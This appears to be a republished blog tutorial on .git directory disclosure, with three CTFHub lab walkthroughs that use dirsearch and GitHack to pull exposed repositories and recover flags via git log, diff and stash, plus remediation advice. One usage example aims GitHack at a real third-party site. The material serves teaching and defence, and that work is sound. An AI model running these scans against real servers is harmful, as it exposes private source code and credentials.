74. Git information leakage vulnerability detection and utilization

Enterprise 2023-12-16 19:49:11 views: null
Vulnerability introduction

Git is an open source distributed version control system. When executing git init to initialize the directory, a .git directory will be automatically created in the current directory to record code change records, etc. When publishing the code, if the .git directory is not included in the Directory deletion is posted directly to the server and the attacker can use it to recover the source code.

Utilize tools

Second location:GitHub - lijiejie/GitHack: A `.git` folder disclosure exploit

Tool principle:

  • Parse the .git/index file and find all (file names, file sha1) in the project 
  • Go to the .git/objects/ folder to download the corresponding file
  • zlib decompresses the file and writes the source code according to the original directory structure

Usage examples:

python3 GitHack.py http://www.openssl.org/.git/

Project address 2:GitHub - BugScanTeam/GitHack: .git leak exploitation tool, which can restore historical versions

Tool usage:

Vulnerability cases
Log example

Step 1: Directly access the shooting range environment to see the following interface information

​​​​​​CTFHub environment instance | prompt information

Step 2: Scan the following directories

python3 dirsearch.py -u http://challenge-ed902de60e85397f.sandbox.ctfhub.com:10800/ -e *

Step 3: From the above results, we can find that there is a git information leak, and then we use Githack (GitHub - BugScanTeam/GitHack: .git leakage exploitation tool to restore historical versions< /span>)Scan it

python2 GitHack.py http://challenge-ed902de60e85397f.sandbox.ctfhub.com:10800/.git/

Step 4: Historical query

git log

Step 5: Find a historical command of add flag from above, and then use the following command to compare the differences and successfully obtain the flag.

#Version comparison
git diff <Branch name 1> <Branch name 2>

#Execution example
git diff 727b1543630ea8e366afb0646dcd24a68273657b

#Version rollback
git reset --hard <branch name>

Stash example

In this question, pay attention to the use of .git stash. This command is mainly used when you want to save the current modifications, but want to return to the clean working repository that was last submitted. .git stash saves the local modifications and Switch the current code to HEAD submission. Below we use the CTFHUB environment to demonstrate:

Step 1: Access the shooting range address and you can see the following interface information


CTFHub environment instance | prompt information

Step 2: Perform a directory scan and find that .git information is leaked

python3 dirsearch.py -u http://challenge-3035c4ab094fc730.sandbox.ctfhub.com:10800/ -e *

Step 3: Scan using Githack

python2 GitHack.py http://challenge-3035c4ab094fc730.sandbox.ctfhub.com:10800/.git/

Step 4: Go to the source code acquisition directory and use git stash list to list all backups in the Git stack. You can use this list to decide from which place to restore.

git stash list

Then use git stash pop to read the most recently saved content from the Git stack and restore the relevant content of the workspace. Since there may be multiple Stash contents, use the stack to manage them. Pop will read the content from the most recent stash. and restore

git stash pop

Then view the file to get the final flag

Index example

Step 1: First visit the project link address and you will see the following prompt message

​​​​​​CTFHub environment instance | prompt information

Step 2: Perform directory scanning and detection using the same method

python3 dirsearch.py -u http://challenge-d9fd1f49efa9f95c.sandbox.ctfhub.com:10800/ -e *

Step 3: Scan using Githack

python2 GitHack.py http://challenge-d9fd1f49efa9f95c.sandbox.ctfhub.com:10800/.git/

Step 4: Enter the directory and view the files to obtain the flag information

Repair suggestions
  • Information change: If sensitive information has been leaked, it is necessary to change the sensitive information and ensure that the new information will not be leaked again, for example: change passwords, API keys, database credentials, etc.
  • Review the code: The code in the Git repository needs to be carefully reviewed to ensure that no other sensitive information has been exposed. Sensitive information such as passwords and credentials can be found using the Git command line or the Git hosting service’s search function
  • Permission removal: Immediately remove public access permissions to prevent further information leakage. You can use the Git command line or Git hosting services (for example: GitHub, GitLab, etc.) to change the access permissions of the warehouse or change the warehouse to private
  • Undo a commit: If sensitive information has been submitted to a public Git repository, you can use the undo commit function of the Git command line or Git hosting service to undo the commit and delete the sensitive information. The specific operation is to use the Git command line or the Git hosting service to undo the commit and force Push to Git repository to overwrite committed history

Guess you like

Origin blog.csdn.net/Fly_hps/article/details/133949333
Recommended
Ranking
element
The difference and advantages of video interview and traditional interview
Title【2002】
【Python pypinyin】--2019-08-06 16:16:55
docker pull image error: ‘invalid checksum digest format‘
ubuntu system: Install python on ubuntu22.04 and set system environment variables
October self-examination is the end and the beginning
Reptile error occurs gbk
The realization of the string function
--- CSS --- beautify the front page elements
Daily
More
2024-08-31(0)
2024-08-30(0)
2024-08-29(0)
2024-08-28(0)
2024-08-27(0)
2024-08-26(0)
2024-08-25(0)
2024-08-24(0)
2024-08-23(0)
2024-08-22(0)

Code World

© 2018 codetd.com